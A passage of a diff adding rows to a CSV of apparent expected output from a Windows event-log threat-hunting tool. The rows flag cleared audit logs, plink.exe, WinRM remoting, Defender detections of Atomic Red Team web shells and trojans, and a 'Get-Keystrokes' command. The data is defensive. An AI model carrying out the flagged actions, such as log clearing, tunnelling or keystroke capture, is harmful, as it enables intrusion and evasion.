+    <TimeCreated SystemTime=""2019-03-18T11:27:00.438449Z"">
+    </TimeCreated>
+    <EventRecordID>433307</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""856"" ThreadID=""1660"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1106</SubjectUserSid>
+      <SubjectUserName>user01</SubjectUserName>
+      <SubjectDomainName>EXAMPLE</SubjectDomainName>
+      <SubjectLogonId>0x18a7875</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",PC01.example.corp,Security
+Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:03:28.318440Z"">
+    </TimeCreated>
+    <EventRecordID>227714</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""SubjectUserName"">user01</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x2ed80</Data>
+    <Data Name=""NewProcessId"">0xcfc</Data>
+    <Data Name=""NewProcessName"">C:\Users\user01\Desktop\plink.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xe60</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>",PC01.example.corp,Security
+Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 )  with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:03:28.318440Z"">
+    </TimeCreated>
+    <EventRecordID>227714</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""SubjectUserName"">user01</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x2ed80</Data>
+    <Data Name=""NewProcessId"">0xcfc</Data>
+    <Data Name=""NewProcessName"">C:\Users\user01\Desktop\plink.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xe60</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>",PC01.example.corp,Security
+Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:01:41.593830Z"">
+    </TimeCreated>
+    <EventRecordID>227693</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""820"" ThreadID=""608"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1108</SubjectUserSid>
+      <SubjectUserName>admin01</SubjectUserName>
+      <SubjectDomainName>EXAMPLE</SubjectDomainName>
+      <SubjectLogonId>0xaf855</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",PC01.example.corp,Security
+connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-WinRM"" Guid=""{a7975c8f-ac13-49f1-87da-5a984a4ab417}"">
+    </Provider>
+    <EventID>91</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>9</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4000000000000004</Keywords>
+    <TimeCreated SystemTime=""2019-05-16T01:33:54.567896Z"">
+    </TimeCreated>
+    <EventRecordID>508</EventRecordID>
+    <Correlation ActivityID=""AE1A2CAB-0B85-0000-AC2F-1AAE850BD501"">
+    </Correlation>
+    <Execution ProcessID=""952"" ThreadID=""960"">
+    </Execution>
+    <Channel>Microsoft-Windows-WinRM/Operational</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security UserID=""S-1-5-21-738609754-2819869699-4189121830-500"">
+    </Security>
+  </System>
+  <ProcessingErrorData>
+    <ErrorCode>15005</ErrorCode>
+    <DataItemName>shellId</DataItemName>
+    <EventPayload>68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000</EventPayload>
+  </ProcessingErrorData>
+</Event>",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational
+Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1117</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:53:31.952568Z"">
+    </TimeCreated>
+    <EventRecordID>106</EventRecordID>
+    <Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""6068"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{8791B1FB-0FE7-412E-B084-524CB5A221F3}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:13.775Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147735426</Data>
+    <Data Name=""Threat Name"">Trojan:XML/Exeselrun.gen!A</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">8</Data>
+    <Data Name=""Category Name"">Trojan</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:XML/Exeselrun.gen!A&amp;threatid=2147735426&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">5</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">2</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">2</Data>
+    <Data Name=""Type Name"">%%823</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">6</Data>
+    <Data Name=""Action Name"">%%811</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x80508023</Data>
+    <Data Name=""Error Description"">The program could not find the malware and other potentially unwanted software on this device. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1117</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:53:31.905406Z"">
+    </TimeCreated>
+    <EventRecordID>105</EventRecordID>
+    <Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""6068"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:16.697Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147708292</Data>
+    <Data Name=""Threat Name"">HackTool:JS/Jsprat</Data>
+    <Data Name=""Severity ID"">4</Data>
+    <Data Name=""Severity Name"">High</Data>
+    <Data Name=""Category ID"">34</Data>
+    <Data Name=""Category Name"">Tool</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=HackTool:JS/Jsprat&amp;threatid=2147708292&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">3</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">2</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068)</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">8</Data>
+    <Data Name=""Type Name"">%%862</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">2</Data>
+    <Data Name=""Action Name"">%%809</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1117</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:53:31.902610Z"">
+    </TimeCreated>
+    <EventRecordID>104</EventRecordID>
+    <Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""6068"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:41:40.357Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147726426</Data>
+    <Data Name=""Threat Name"">Trojan:Win32/Sehyioa.A!cl</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">8</Data>
+    <Data Name=""Category Name"">Trojan</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:Win32/Sehyioa.A!cl&amp;threatid=2147726426&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">3</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">2</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">8</Data>
+    <Data Name=""Type Name"">%%862</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">2</Data>
+    <Data Name=""Action Name"">%%809</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1117</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:53:31.900809Z"">
+    </TimeCreated>
+    <EventRecordID>103</EventRecordID>
+    <Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""6068"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:18.385Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147683177</Data>
+    <Data Name=""Threat Name"">Backdoor:ASP/Ace.T</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">6</Data>
+    <Data Name=""Category Name"">Backdoor</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Backdoor:ASP/Ace.T&amp;threatid=2147683177&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">3</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">2</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">0</Data>
+    <Data Name=""Type Name"">%%822</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">2</Data>
+    <Data Name=""Action Name"">%%809</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User (  ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1116</EventID>
+    <Version>0</Version>
+    <Level>3</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:51:50.798994Z"">
+    </TimeCreated>
+    <EventRecordID>102</EventRecordID>
+    <Correlation ActivityID=""40013F0F-EF76-4940-A8B2-4DE50BE9AAC3"">
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""6068"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:16.697Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147708292</Data>
+    <Data Name=""Threat Name"">HackTool:JS/Jsprat</Data>
+    <Data Name=""Severity ID"">4</Data>
+    <Data Name=""Severity Name"">High</Data>
+    <Data Name=""Category ID"">34</Data>
+    <Data Name=""Category Name"">Tool</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=HackTool:JS/Jsprat&amp;threatid=2147708292&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">1</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">1</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068)</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">8</Data>
+    <Data Name=""Type Name"">%%862</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">9</Data>
+    <Data Name=""Action Name"">%%887</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User""></Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1117,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1117</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
